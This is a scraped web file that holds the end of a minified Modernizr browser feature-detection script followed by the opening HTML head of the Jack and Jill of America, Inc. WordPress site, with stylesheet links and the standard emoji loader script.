addTest("videoautoplay",!1);o.src="data:video/mp4;base64,AAAAIGZ0eXBpc29tAAACAGlzb21pc28yYXZjMW1wNDEAAAAIZnJlZQAAAs1tZGF0AAACrgYF//+q3EXpvebZSLeWLNgg2SPu73gyNjQgLSBjb3JlIDE0OCByMjYwMSBhMGNkN2QzIC0gSC4yNjQvTVBFRy00IEFWQyBjb2RlYyAtIENvcHlsZWZ0IDIwMDMtMjAxNSAtIGh0dHA6Ly93d3cudmlkZW9sYW4ub3JnL3gyNjQuaHRtbCAtIG9wdGlvbnM6IGNhYmFjPTEgcmVmPTMgZGVibG9jaz0xOjA6MCBhbmFseXNlPTB4MzoweDExMyBtZT1oZXggc3VibWU9NyBwc3k9MSBwc3lfcmQ9MS4wMDowLjAwIG1peGVkX3JlZj0xIG1lX3JhbmdlPTE2IGNocm9tYV9tZT0xIHRyZWxsaXM9MSA4eDhkY3Q9MSBjcW09MCBkZWFkem9uZT0yMSwxMSBmYXN0X3Bza2lwPTEgY2hyb21hX3FwX29mZnNldD0tMiB0aHJlYWRzPTEgbG9va2FoZWFkX3RocmVhZHM9MSBzbGljZWRfdGhyZWFkcz0wIG5yPTAgZGVjaW1hdGU9MSBpbnRlcmxhY2VkPTAgYmx1cmF5X2NvbXBhdD0wIGNvbnN0cmFpbmVkX2ludHJhPTAgYmZyYW1lcz0zIGJfcHlyYW1pZD0yIGJfYWRhcHQ9MSBiX2JpYXM9MCBkaXJlY3Q9MSB3ZWlnaHRiPTEgb3Blbl9nb3A9MCB3ZWlnaHRwPTIga2V5aW50PTI1MCBrZXlpbnRfbWluPTEwIHNjZW5lY3V0PTQwIGludHJhX3JlZnJlc2g9MCByY19sb29rYWhlYWQ9NDAgcmM9Y3JmIG1idHJlZT0xIGNyZj0yMy4wIHFjb21wPTAuNjAgcXBtaW49MCBxcG1heD02OSBxcHN0ZXA9NCBpcF9yYXRpbz0xLjQwIGFxPTE6MS4wMACAAAAAD2WIhAA3//728P4FNjuZQQAAAu5tb292AAAAbG12aGQAAAAAAAAAAAAAAAAAAAPoAAAAZAABAAABAAAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAACGHRyYWsAAABcdGtoZAAAAAMAAAAAAAAAAAAAAAEAAAAAAAAAZAAAAAAAAAAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAEAAAAAAAgAAAAIAAAAAACRlZHRzAAAAHGVsc3QAAAAAAAAAAQAAAGQAAAAAAAEAAAAAAZBtZGlhAAAAIG1kaGQAAAAAAAAAAAAAAAAAACgAAAAEAFXEAAAAAAAtaGRscgAAAAAAAAAAdmlkZQAAAAAAAAAAAAAAAFZpZGVvSGFuZGxlcgAAAAE7bWluZgAAABR2bWhkAAAAAQAAAAAAAAAAAAAAJGRpbmYAAAAcZHJlZgAAAAAAAAABAAAADHVybCAAAAABAAAA+3N0YmwAAACXc3RzZAAAAAAAAAABAAAAh2F2YzEAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAgACAEgAAABIAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAY//8AAAAxYXZjQwFkAAr/4QAYZ2QACqzZX4iIhAAAAwAEAAADAFA8SJZYAQAGaOvjyyLAAAAAGHN0dHMAAAAAAAAAAQAAAAEAAAQAAAAAHHN0c2MAAAAAAAAAAQAAAAEAAAABAAAAAQAAABRzdHN6AAAAAAAAAsUAAAABAAAAFHN0Y28AAAAAAAAAAQAAADAAAABidWR0YQAAAFptZXRhAAAAAAAAACFoZGxyAAAAAAAAAABtZGlyYXBwbAAAAAAAAAAAAAAAAC1pbHN0AAAAJal0b28AAAAdZGF0YQAAAAEAAAAATGF2ZjU2LjQwLjEwMQ=="}}catch(d){return void addTest("videoautoplay",!1)}o.setAttribute("autoplay",""),i.cssText="display:none",docElement.appendChild(o),setTimeout(function(){o.addEventListener("playing",A,!1),e=setTimeout(A,t)},0)}),Modernizr.addTest("videocrossorigin","crossOrigin"in createElement("video")),Modernizr.addTest("videoloop","loop"in createElement("video")),Modernizr.addTest("videopreload","preload"in createElement("video")),Modernizr.addAsyncTest(function(){if(Modernizr.webglextensions=!1,Modernizr.webgl){var A,e,t;try{A=createElement("canvas"),e=A.getContext("webgl")||A.getContext("experimental-webgl"),t=e.getSupportedExtensions()}catch(r){return}e!==undefined&&(Modernizr.webglextensions=new Boolean(!0));for(var n=-1,o=t.length;++n<o;)Modernizr.webglextensions[t[n]]=!0;A=undefined}}),Modernizr.addAsyncTest(function(){var A,e,t=function(A){docElement.contains(A)||docElement.appendChild(A)},r=function(A){A.fake&&A.parentNode&&A.parentNode.removeChild(A)},n=function(A,e){var t=!!A;if(t&&(t=new Boolean(t),t.blocked="blocked"===A),addTest("flash",function(){return t}),e&&s.contains(e)){for(;e.parentNode!==s;)e=e.parentNode;s.removeChild(e)}};try{e="ActiveXObject"in window&&"Pan"in new window.ActiveXObject("ShockwaveFlash.ShockwaveFlash")}catch(o){}if(A=!("plugins"in navigator&&"Shockwave Flash"in navigator.plugins||e),A||isSVG)n(!1);else{var i,d,a=createElement("embed"),s=getBody();if(a.type="application/x-shockwave-flash",s.appendChild(a),!("Pan"in a||e))return t(s),n("blocked",a),void r(s);i=function(){return t(s),docElement.contains(s)?(docElement.contains(a)?(d=a.style.cssText,""!==d?n("blocked",a):n(!0,a)):n("blocked"),void r(s)):(s=document.body||s,a=createElement("embed"),a.type="application/x-shockwave-flash",s.appendChild(a),setTimeout(i,1e3))},setTimeout(i,10)}});var mq=function(){var A=window.matchMedia||window.msMatchMedia;return A?function(e){var t=A(e);return t&&t.matches||!1}:function(A){var e=!1;return injectElementWithStyles("@media "+A+" { #modernizr { position: absolute; } }",function(A){e="absolute"==(window.getComputedStyle?window.getComputedStyle(A,null):A.currentStyle).position}),e}}();ModernizrProto.mq=mq,Modernizr.addTest("mediaqueries",mq("only all")),Modernizr.addTest("hovermq",mq("(hover)")),Modernizr.addTest("pointermq",mq("(pointer:coarse),(pointer:fine),(pointer:none)"));var testStyles=ModernizrProto.testStyles=injectElementWithStyles;Modernizr.addTest("hiddenscroll",function(){return testStyles("#modernizr {width:100px;height:100px;overflow:scroll}",function(A){return A.offsetWidth===A.clientWidth})}),Modernizr.addTest("mathml",function(){var A;return testStyles("#modernizr{position:absolute;display:inline-block}",function(e){e.innerHTML+="<math><mfrac><mi>xx</mi><mi>yy</mi></mfrac></math>",A=e.offsetHeight>e.offsetWidth}),A}),Modernizr.addTest("touchevents",function(){var A;if("ontouchstart"in window||window.DocumentTouch&&document instanceof DocumentTouch)A=!0;else{var e=["@media (",prefixes.join("touch-enabled),("),"heartz",")","{#modernizr{top:9px;position:absolute}}"].join("");testStyles(e,function(e){A=9===e.offsetTop})}return A}),Modernizr.addTest("unicoderange",function(){return Modernizr.testStyles('@font-face{font-family:"unicodeRange";src:local("Arial");unicode-range:U+0020,U+002E}#modernizr span{font-size:20px;display:inline-block;font-family:"unicodeRange",monospace}#modernizr .mono{font-family:monospace}',function(A){for(var e=[".",".","m","m"],t=0;t<e.length;t++){var r=createElement("span");r.innerHTML=e[t],r.className=t%2?"mono":"",A.appendChild(r),e[t]=r.clientWidth}return e[0]!==e[1]&&e[2]===e[3]})}),Modernizr.addTest("unicode",function(){var A,e=createElement("span"),t=createElement("span");return testStyles("#modernizr{font-family:Arial,sans;font-size:300em;}",function(r){e.innerHTML=isSVG?"妇":"&#5987;",t.innerHTML=isSVG?"☆":"&#9734;",r.appendChild(e),r.appendChild(t),A="offsetWidth"in e&&e.offsetWidth!==t.offsetWidth}),A}),Modernizr.addTest("checked",function(){return testStyles("#modernizr {position:absolute} #modernizr input {margin-left:10px} #modernizr :checked {margin-left:20px;display:block}",function(A){var e=createElement("input");return e.setAttribute("type","checkbox"),e.setAttribute("checked","checked"),A.appendChild(e),20===e.offsetLeft})}),testStyles("#modernizr{display: table; direction: ltr}#modernizr div{display: table-cell; padding: 10px}",function(A){var e,t=A.childNodes;e=t[0].offsetLeft<t[1].offsetLeft,Modernizr.addTest("displaytable",e,{aliases:["display-table"]})},2);var blacklist=function(){var A=navigator.userAgent,e=A.match(/w(eb)?osbrowser/gi),t=A.match(/windows phone/gi)&&A.match(/iemobile\/([0-9])+/gi)&&parseFloat(RegExp.$1)>=9;return e||t}();blacklist?Modernizr.addTest("fontface",!1):testStyles('@font-face {font-family:"font";src:url("https://")}',function(A,e){var t=document.getElementById("smodernizr"),r=t.sheet||t.styleSheet,n=r?r.cssRules&&r.cssRules[0]?r.cssRules[0].cssText:r.cssText||"":"",o=/src/i.test(n)&&0===n.indexOf(e.split(" ")[0]);Modernizr.addTest("fontface",o)}),testStyles('#modernizr{font:0/0 a}#modernizr:after{content:":)";visibility:hidden;font:7px/1 a}',function(A){Modernizr.addTest("generatedcontent",A.offsetHeight>=6)}),Modernizr.addTest("hairline",function(){return testStyles("#modernizr {border:.5px solid transparent}",function(A){return 1===A.offsetHeight})}),Modernizr.addTest("cssinvalid",function(){return testStyles("#modernizr input{height:0;border:0;padding:0;margin:0;width:10px} #modernizr input:invalid{width:50px}",function(A){var e=createElement("input");return e.required=!0,A.appendChild(e),e.clientWidth>10})}),testStyles("#modernizr div {width:100px} #modernizr :last-child{width:200px;display:block}",function(A){Modernizr.addTest("lastchild",A.lastChild.offsetWidth>A.firstChild.offsetWidth)},2),testStyles("#modernizr div {width:1px} #modernizr div:nth-child(2n) {width:2px;}",function(A){for(var e=A.getElementsByTagName("div"),t=!0,r=0;5>r;r++)t=t&&e[r].offsetWidth===r%2+1;Modernizr.addTest("nthchild",t)},5),testStyles("#modernizr{overflow: scroll; width: 40px; height: 40px; }#"+prefixes.join("scrollbar{width:10px} #modernizr::").split("#").slice(1).join("#")+"scrollbar{width:10px}",function(A){Modernizr.addTest("cssscrollbar","scrollWidth"in A&&30==A.scrollWidth)}),Modernizr.addTest("siblinggeneral",function(){return testStyles("#modernizr div {width:100px} #modernizr div ~ div {width:200px;display:block}",function(A){return 200==A.lastChild.offsetWidth},2)}),testStyles("#modernizr{position: absolute; top: -10em; visibility:hidden; font: normal 10px arial;}#subpixel{float: left; font-size: 33.3333%;}",function(A){var e=A.firstChild;e.innerHTML="This is a text written in Arial",Modernizr.addTest("subpixelfont",window.getComputedStyle?"44px"!==window.getComputedStyle(e,null).getPropertyValue("width"):!1)},1,["subpixel"]),Modernizr.addTest("cssvalid",function(){return testStyles("#modernizr input{height:0;border:0;padding:0;margin:0;width:10px} #modernizr input:valid{width:50px}",function(A){var e=createElement("input");return A.appendChild(e),e.clientWidth>10})}),Modernizr.addTest("details",function(){var A,e=createElement("details");return"open"in e?(testStyles("#modernizr details{display:block}",function(t){t.appendChild(e),e.innerHTML="<summary>a</summary>b",A=e.offsetHeight,e.open=!0,A=A!=e.offsetHeight}),A):!1}),Modernizr.addTest("oninput",function(){ var A,e=createElement("input");if(e.setAttribute("oninput","return"),hasEvent("oninput",docElement)||"function"==typeof e.oninput)return!0;try{var t=document.createEvent("KeyboardEvent");A=!1;var r=function(e){A=!0,e.preventDefault(),e.stopPropagation()};t.initKeyEvent("keypress",!0,!0,window,!1,!1,!1,!1,0,"e".charCodeAt(0)),docElement.appendChild(e),e.addEventListener("input",r,!1),e.focus(),e.dispatchEvent(t),e.removeEventListener("input",r,!1),docElement.removeChild(e)}catch(n){A=!1}return A}),Modernizr.addTest("formvalidation",function(){var A=createElement("form");if(!("checkValidity"in A&&"addEventListener"in A))return!1;if("reportValidity"in A)return!0;var e,t=!1;return Modernizr.formvalidationapi=!0,A.addEventListener("submit",function(A){(!window.opera||window.operamini)&&A.preventDefault(),A.stopPropagation()},!1),A.innerHTML='<input name="modTest" required="required" /><button></button>',testStyles("#modernizr form{position:absolute;top:-99999em}",function(r){r.appendChild(A),e=A.getElementsByTagName("input")[0],e.addEventListener("invalid",function(A){t=!0,A.preventDefault(),A.stopPropagation()},!1),Modernizr.formvalidationmessage=!!e.validationMessage,A.getElementsByTagName("button")[0].click()}),t});var inputElem=createElement("input"),inputattrs="autocomplete autofocus list placeholder max min multiple pattern required step".split(" "),attrs={};Modernizr.input=function(A){for(var e=0,t=A.length;t>e;e++)attrs[A[e]]=!!(A[e]in inputElem);return attrs.list&&(attrs.list=!(!createElement("datalist")||!window.HTMLDataListElement)),attrs}(inputattrs),Modernizr.addTest("datalistelem",Modernizr.input.list);var inputtypes="search tel url email datetime date month week time datetime-local number range color".split(" "),inputs={};Modernizr.inputtypes=function(A){for(var e,t,r,n=A.length,o="1)",i=0;n>i;i++)inputElem.setAttribute("type",e=A[i]),r="text"!==inputElem.type&&"style"in inputElem,r&&(inputElem.value=o,inputElem.style.cssText="position:absolute;visibility:hidden;",/^range$/.test(e)&&inputElem.style.WebkitAppearance!==undefined?(docElement.appendChild(inputElem),t=document.defaultView,r=t.getComputedStyle&&"textfield"!==t.getComputedStyle(inputElem,null).WebkitAppearance&&0!==inputElem.offsetHeight,docElement.removeChild(inputElem)):/^(search|tel)$/.test(e)||(r=/^(url|email)$/.test(e)?inputElem.checkValidity&&inputElem.checkValidity()===!1:inputElem.value!=o)),inputs[A[i]]=!!r;return inputs}(inputtypes);var modElem={elem:createElement("modernizr")};Modernizr._q.push(function(){delete modElem.elem}),Modernizr.addTest("csschunit",function(){var A,e=modElem.elem.style;try{e.fontSize="3ch",A=-1!==e.fontSize.indexOf("ch")}catch(t){A=!1}return A}),Modernizr.addTest("cssexunit",function(){var A,e=modElem.elem.style;try{e.fontSize="3ex",A=-1!==e.fontSize.indexOf("ex")}catch(t){A=!1}return A}),Modernizr.addTest("hsla",function(){var A=createElement("a").style;return A.cssText="background-color:hsla(120,40%,100%,.5)",contains(A.backgroundColor,"rgba")||contains(A.backgroundColor,"hsla")}),Modernizr.addTest("bdi",function(){var A=createElement("div"),e=createElement("bdi");e.innerHTML="&#1573;",A.appendChild(e),docElement.appendChild(A);var t="rtl"===computedStyle(e,null,"direction");return docElement.removeChild(A),t}),testStyles("#modernizr { height: 50vh; }",function(A){var e=parseInt(window.innerHeight/2,10),t=parseInt(computedStyle(A,null,"height"),10);Modernizr.addTest("cssvhunit",roundedEquals(t,e))}),testStyles("#modernizr1{width: 50vmax}#modernizr2{width:50px;height:50px;overflow:scroll}#modernizr3{position:fixed;top:0;left:0;bottom:0;right:0}",function(A){var e=A.childNodes[2],t=A.childNodes[1],r=A.childNodes[0],n=parseInt((t.offsetWidth-t.clientWidth)/2,10),o=r.clientWidth/100,i=r.clientHeight/100,d=parseInt(50*Math.max(o,i),10),a=parseInt(computedStyle(e,null,"width"),10);Modernizr.addTest("cssvmaxunit",roundedEquals(d,a)||roundedEquals(d,a-n))},3),testStyles("#modernizr1{width: 50vm;width:50vmin}#modernizr2{width:50px;height:50px;overflow:scroll}#modernizr3{position:fixed;top:0;left:0;bottom:0;right:0}",function(A){var e=A.childNodes[2],t=A.childNodes[1],r=A.childNodes[0],n=parseInt((t.offsetWidth-t.clientWidth)/2,10),o=r.clientWidth/100,i=r.clientHeight/100,d=parseInt(50*Math.min(o,i),10),a=parseInt(computedStyle(e,null,"width"),10);Modernizr.addTest("cssvminunit",roundedEquals(d,a)||roundedEquals(d,a-n))},3),testStyles("#modernizr { width: 50vw; }",function(A){var e=parseInt(window.innerWidth/2,10),t=parseInt(computedStyle(A,null,"width"),10);Modernizr.addTest("cssvwunit",roundedEquals(t,e))});var testXhrType=function(A){if("undefined"==typeof XMLHttpRequest)return!1;var e=new XMLHttpRequest;e.open("get","/",!0);try{e.responseType=A}catch(t){return!1}return"response"in e&&e.responseType==A};Modernizr.addTest("xhrresponsetypearraybuffer",testXhrType("arraybuffer")),Modernizr.addTest("xhrresponsetypeblob",testXhrType("blob")),Modernizr.addTest("xhrresponsetypedocument",testXhrType("document")),Modernizr.addTest("xhrresponsetypejson",testXhrType("json")),Modernizr.addTest("xhrresponsetypetext",testXhrType("text"));var toStringFn={}.toString;Modernizr.addTest("svgclippaths",function(){return!!document.createElementNS&&/SVGClipPath/.test(toStringFn.call(document.createElementNS("http://www.w3.org/2000/svg","clipPath")))}),Modernizr.addTest("svgforeignobject",function(){return!!document.createElementNS&&/SVGForeignObject/.test(toStringFn.call(document.createElementNS("http://www.w3.org/2000/svg","foreignObject")))}),Modernizr.addTest("smil",function(){return!!document.createElementNS&&/SVGAnimate/.test(toStringFn.call(document.createElementNS("http://www.w3.org/2000/svg","animate")))});var mStyle={style:modElem.elem.style};Modernizr._q.unshift(function(){delete mStyle.style});var testProp=ModernizrProto.testProp=function(A,e,t){return testProps([A],undefined,e,t)};Modernizr.addTest("textshadow",testProp("textShadow","1px 1px")),ModernizrProto.testAllProps=testPropsAll;var prefixed=ModernizrProto.prefixed=function(A,e,t){return 0===A.indexOf("@")?atRule(A):(-1!=A.indexOf("-")&&(A=cssToDOM(A)),e?testPropsAll(A,e,t):testPropsAll(A,"pfx"))},prefixedCSS=ModernizrProto.prefixedCSS=function(A){var e=prefixed(A);return e&&domToCSS(e)};Modernizr.addTest("batteryapi",!!prefixed("battery",navigator),{aliases:["battery-api"]});var crypto=prefixed("crypto",window);Modernizr.addTest("crypto",!!prefixed("subtle",crypto)),Modernizr.addTest("dart",!!prefixed("startDart",navigator)),Modernizr.addTest("forcetouch",function(){return hasEvent(prefixed("mouseforcewillbegin",window,!1),window)?MouseEvent.WEBKIT_FORCE_AT_MOUSE_DOWN&&MouseEvent.WEBKIT_FORCE_AT_FORCE_MOUSE_DOWN:!1}),Modernizr.addTest("fullscreen",!(!prefixed("exitFullscreen",document,!1)&&!prefixed("cancelFullScreen",document,!1))),Modernizr.addTest("gamepads",!!prefixed("getGamepads",navigator)),Modernizr.addAsyncTest(function(){var A;try{A=prefixed("indexedDB",window)}catch(e){}if(A){var t="modernizr-"+Math.random(),r=A.open(t);r.onerror=function(){r.error&&"InvalidStateError"===r.error.name?addTest("indexeddb",!1):(addTest("indexeddb",!0),detectDeleteDatabase(A,t))},r.onsuccess=function(){addTest("indexeddb",!0),detectDeleteDatabase(A,t)}}else addTest("indexeddb",!1)}),Modernizr.addAsyncTest(function(){var A,e,t,r,n="detect-blob-support",o=!1;try{A=prefixed("indexedDB",window)}catch(i){}if(!Modernizr.indexeddb||!Modernizr.indexeddb.deletedatabase)return!1;try{A.deleteDatabase(n).onsuccess=function(){e=A.open(n,1),e.onupgradeneeded=function(){e.result.createObjectStore("store")},e.onsuccess=function(){t=e.result;try{r=t.transaction("store","readwrite").objectStore("store").put(new Blob,"key"),r.onsuccess=function(){o=!0},r.onerror=function(){o=!1}}catch(i){o=!1}finally{addTest("indexeddbblob",o),t.close(),A.deleteDatabase(n)}}}}catch(i){addTest("indexeddbblob",!1)}}),Modernizr.addTest("intl",!!prefixed("Intl",window)),Modernizr.addTest("pagevisibility",!!prefixed("hidden",document,!1)),Modernizr.addTest("performance",!!prefixed("performance",window)),Modernizr.addTest("pointerlock",!!prefixed("exitPointerLock",document)),Modernizr.addTest("quotamanagement",function(){var A=prefixed("temporaryStorage",navigator),e=prefixed("persistentStorage",navigator);return!(!A||!e)}),Modernizr.addTest("requestanimationframe",!!prefixed("requestAnimationFrame",window),{aliases:["raf"]}),Modernizr.addTest("vibrate",!!prefixed("vibrate",navigator)),Modernizr.addTest("webintents",!!prefixed("startActivity",navigator)),Modernizr.addTest("lowbattery",function(){var A=.2,e=prefixed("battery",navigator);return!!(e&&!e.charging&&e.level<=A)});var crypto=prefixed("crypto",window),supportsGetRandomValues;if(crypto&&"getRandomValues"in crypto&&"Uint32Array"in window){var array=new Uint32Array(10),values=crypto.getRandomValues(array);supportsGetRandomValues=values&&is(values[0],"number")}Modernizr.addTest("getrandomvalues",!!supportsGetRandomValues),Modernizr.addTest("backgroundblendmode",prefixed("backgroundBlendMode","text")),Modernizr.addTest("objectfit",!!prefixed("objectFit"),{aliases:["object-fit"]}),Modernizr.addTest("regions",function(){if(isSVG)return!1;var A=prefixed("flowFrom"),e=prefixed("flowInto"),t=!1;if(!A||!e)return t;var r=createElement("iframe"),n=createElement("div"),o=createElement("div"),i=createElement("div"),d="modernizr_flow_for_regions_check";o.innerText="M",n.style.cssText="top: 150px; left: 150px; padding: 0px;",i.style.cssText="width: 50px; height: 50px; padding: 42px;",i.style[A]=d,n.appendChild(o),n.appendChild(i),docElement.appendChild(n);var a,s,l=o.getBoundingClientRect();return o.style[e]=d,a=o.getBoundingClientRect(),s=parseInt(a.left-l.left,10),docElement.removeChild(n),42==s?t=!0:(docElement.appendChild(r),l=r.getBoundingClientRect(),r.style[e]=d,a=r.getBoundingClientRect(),l.height>0&&l.height!==a.height&&0===a.height&&(t=!0)),o=i=n=r=undefined,t}),Modernizr.addTest("wrapflow",function(){var A=prefixed("wrapFlow");if(!A||isSVG)return!1;var e=A.replace(/([A-Z])/g,function(A,e){return"-"+e.toLowerCase()}).replace(/^ms-/,"-ms-"),t=createElement("div"),r=createElement("div"),n=createElement("span");r.style.cssText="position: absolute; left: 50px; width: 100px; height: 20px;"+e+":end;",n.innerText="X",t.appendChild(r),t.appendChild(n),docElement.appendChild(t);var o=n.offsetLeft;return docElement.removeChild(t),r=n=t=undefined,150==o}),Modernizr.addTest("filesystem",!!prefixed("requestFileSystem",window)),Modernizr.addTest("requestautocomplete",!!prefixed("requestAutocomplete",createElement("form"))),Modernizr.addTest("speechrecognition",!!prefixed("SpeechRecognition",window));var url=prefixed("URL",window,!1);url=url&&window[url],Modernizr.addTest("bloburls",url&&"revokeObjectURL"in url&&"createObjectURL"in url),Modernizr.addAsyncTest(function(){function A(){addTest("transferables",!1),e()}function e(){d&&URL.revokeObjectURL(d),a&&a.terminate(),n&&clearTimeout(n)}var t=!!(Modernizr.blobconstructor&&Modernizr.bloburls&&Modernizr.webworkers&&Modernizr.typedarrays);if(!t)return addTest("transferables",!1);try{var r,n,o='var hello = "world"',i=new Blob([o],{type:"text/javascript"}),d=URL.createObjectURL(i),a=new Worker(d);a.onerror=A,n=setTimeout(A,200),r=new ArrayBuffer(1),a.postMessage(r,[r]),addTest("transferables",0===r.byteLength),e()}catch(s){A()}}),Modernizr.addTest("peerconnection",!!prefixed("RTCPeerConnection",window)),Modernizr.addTest("datachannel",function(){if(!Modernizr.peerconnection)return!1;for(var A=0,e=domPrefixes.length;e>A;A++){var t=window[domPrefixes[A]+"RTCPeerConnection"];if(t){var r=new t(null);return"createDataChannel"in r}}return!1}),Modernizr.addTest("matchmedia",!!prefixed("matchMedia",window)),ModernizrProto.testAllProps=testAllProps,Modernizr.addTest("ligatures",testAllProps("fontFeatureSettings",'"liga" 1')),Modernizr.addTest("cssanimations",testAllProps("animationName","a",!0)),Modernizr.addTest("csspseudoanimations",function(){var A=!1;if(!Modernizr.cssanimations||!window.getComputedStyle)return A;var e=["@",Modernizr._prefixes.join("keyframes csspseudoanimations { from { font-size: 10px; } }@").replace(/\@$/,""),'#modernizr:before { content:" "; font-size:5px;',Modernizr._prefixes.join("animation:csspseudoanimations 1ms infinite;"),"}"].join("");return Modernizr.testStyles(e,function(e){A="10px"===window.getComputedStyle(e,":before").getPropertyValue("font-size")}),A}),Modernizr.addTest("appearance",testAllProps("appearance")),Modernizr.addTest("backdropfilter",testAllProps("backdropFilter")),Modernizr.addTest("backgroundcliptext",function(){return testAllProps("backgroundClip","text")}),Modernizr.addTest("bgpositionxy",function(){return testAllProps("backgroundPositionX","3px",!0)&&testAllProps("backgroundPositionY","5px",!0)}),Modernizr.addTest("bgrepeatround",testAllProps("backgroundRepeat","round")),Modernizr.addTest("bgrepeatspace",testAllProps("backgroundRepeat","space")),Modernizr.addTest("backgroundsize",testAllProps("backgroundSize","100%",!0)),Modernizr.addTest("bgsizecover",testAllProps("backgroundSize","cover")),Modernizr.addTest("borderimage",testAllProps("borderImage","url() 1",!0)),Modernizr.addTest("borderradius",testAllProps("borderRadius","0px",!0)),Modernizr.addTest("boxshadow",testAllProps("boxShadow","1px 1px",!0)),Modernizr.addTest("boxsizing",testAllProps("boxSizing","border-box",!0)&&(document.documentMode===undefined||document.documentMode>7)),function(){Modernizr.addTest("csscolumns",function(){var A=!1,e=testAllProps("columnCount");try{A=!!e,A&&(A=new Boolean(A))}catch(t){}return A});for(var A,e,t=["Width","Span","Fill","Gap","Rule","RuleColor","RuleStyle","RuleWidth","BreakBefore","BreakAfter","BreakInside"],r=0;r<t.length;r++)A=t[r].toLowerCase(),e=testAllProps("column"+t[r]),("breakbefore"===A||"breakafter"===A||"breakinside"==A)&&(e=e||testAllProps(t[r])),Modernizr.addTest("csscolumns."+A,e)}(),Modernizr.addTest("cssgridlegacy",testAllProps("grid-columns","10px",!0)),Modernizr.addTest("cssgrid",testAllProps("grid-template-rows","none",!0)),Modernizr.addTest("displayrunin",testAllProps("display","run-in"),{aliases:["display-runin"]}),Modernizr.addTest("ellipsis",testAllProps("textOverflow","ellipsis")),Modernizr.addTest("cssfilters",function(){if(Modernizr.supports)return testAllProps("filter","blur(2px)");var A=createElement("a");return A.style.cssText=prefixes.join("filter:blur(2px); "),!!A.style.length&&(document.documentMode===undefined||document.documentMode>9)}),Modernizr.addTest("flexbox",testAllProps("flexBasis","1px",!0)),Modernizr.addTest("flexboxlegacy",testAllProps("boxDirection","reverse",!0)),Modernizr.addTest("flexboxtweener",testAllProps("flexAlign","end",!0)),Modernizr.addTest("flexwrap",testAllProps("flexWrap","wrap",!0)),Modernizr.addTest("cssmask",testAllProps("maskRepeat","repeat-x",!0)),Modernizr.addTest("overflowscrolling",testAllProps("overflowScrolling","touch",!0)),Modernizr.addTest("cssreflections",testAllProps("boxReflect","above",!0)),Modernizr.addTest("cssresize",testAllProps("resize","both",!0)),Modernizr.addTest("scrollsnappoints",testAllProps("scrollSnapType")),Modernizr.addTest("shapes",testAllProps("shapeOutside","content-box",!0)),Modernizr.addTest("textalignlast",testAllProps("textAlignLast")),Modernizr.addTest("csstransforms",function(){return-1===navigator.userAgent.indexOf("Android 2.")&&testAllProps("transform","scale(1)",!0)}),Modernizr.addTest("csstransforms3d",function(){return!!testAllProps("perspective","1px",!0)}),Modernizr.addTest("csstransformslevel2",function(){return testAllProps("translate","45px",!0)}),Modernizr.addTest("csstransitions",testAllProps("transition","all",!0)),Modernizr.addTest("csspseudotransitions",function(){var A=!1;if(!Modernizr.csstransitions||!window.getComputedStyle)return A;var e='#modernizr:before { content:" "; font-size:5px;'+Modernizr._prefixes.join("transition:0s 100s;")+"}#modernizr.trigger:before { font-size:10px; }";return Modernizr.testStyles(e,function(e){window.getComputedStyle(e,":before").getPropertyValue("font-size"),e.className+="trigger",A="5px"===window.getComputedStyle(e,":before").getPropertyValue("font-size")}),A}),Modernizr.addTest("userselect",testAllProps("userSelect","none",!0)),Modernizr.addTest("variablefonts",testAllProps("fontVariationSettings")),testRunner(),setClasses(classes),delete ModernizrProto.addTest,delete ModernizrProto.addAsyncTest;for(var i=0;i<Modernizr._q.length;i++)Modernizr._q[i]();window.Modernizr=Modernizr}(window,document);
0
<!doctype html> <html> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"> <link href='https://fonts.googleapis.com/css?family=Lato:400,100,100italic,300,300italic,400italic,700,700italic,900,900italic' rel='stylesheet' type='text/css'> <title>Jack and Jill of America, Inc. | Let&#039;s Work, Let&#039;s Play, Let&#039;s Live Together </title> <link href="https://jackandjillinc.org/wp-content/themes/JackandJillTheme/css/font-awesome.min.css" type="text/css" rel="stylesheet"> <link href="https://jackandjillinc.org/wp-content/themes/JackandJillTheme/fonts/stylesheet.css" type="text/css" rel="stylesheet"> <link href="https://jackandjillinc.org/wp-content/themes/JackandJillTheme/css/flexslider.css" type="text/css" rel="stylesheet"> <link href="https://jackandjillinc.org/wp-content/themes/JackandJillTheme/css/jquery.fancybox.css" type="text/css" rel="stylesheet"> <link rel="alternate" type="application/rss+xml" title="Jack and Jill of America, Inc. &raquo; Feed" href="https://jackandjillinc.org/feed/" /> <link rel="alternate" type="application/rss+xml" title="Jack and Jill of America, Inc. &raquo; Comments Feed" href="https://jackandjillinc.org/comments/feed/" /> <link rel="alternate" type="text/calendar" title="Jack and Jill of America, Inc. &raquo; iCal Feed" href="https://jackandjillinc.org/events/?ical=1" /> <script type="text/javascript"> window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/72x72\/","ext":".png","source":{"concatemoji":"https:\/\/jackandjillinc.org\/wp-includes\/js\/wp-emoji-release.min.js?ver=4.3.19"}}; !function(a,b,c){function d(a){var c=b.createElement("canvas"),d=c.getContext&&c.getContext("2d");return d&&d.fillText?(d.textBaseline="top",d.font="600 32px Arial","flag"===a?(d.fillText(String.fromCharCode(55356,56812,55356,56807),0,0),c.toDataURL().length>3e3):(d.fillText(String.fromCharCode(55357,56835),0,0),0!==d.getImageData(16,16,1,1).data[0])):!1}function e(a){var c=b.createElement("script");c.src=a,c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var f,g;c.supports={simple:d("simple"),flag:d("flag")},c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.simple&&c.supports.flag||(g=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",g,!1),a.addEventListener("load",g,!1)):(a.attachEvent("onload",g),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),f=c.source||{},f.concatemoji?e(f.concatemoji):f.wpemoji&&f.twemoji&&(e(f.twemoji),e(f.wpemoji)))}(window,document,window._wpemojiSettings); </script> <style type="text/css"> img.wp-smiley, img.emoji { display: inline !important; border: none !important; box-shadow: none !important; height: 1em !important; width: 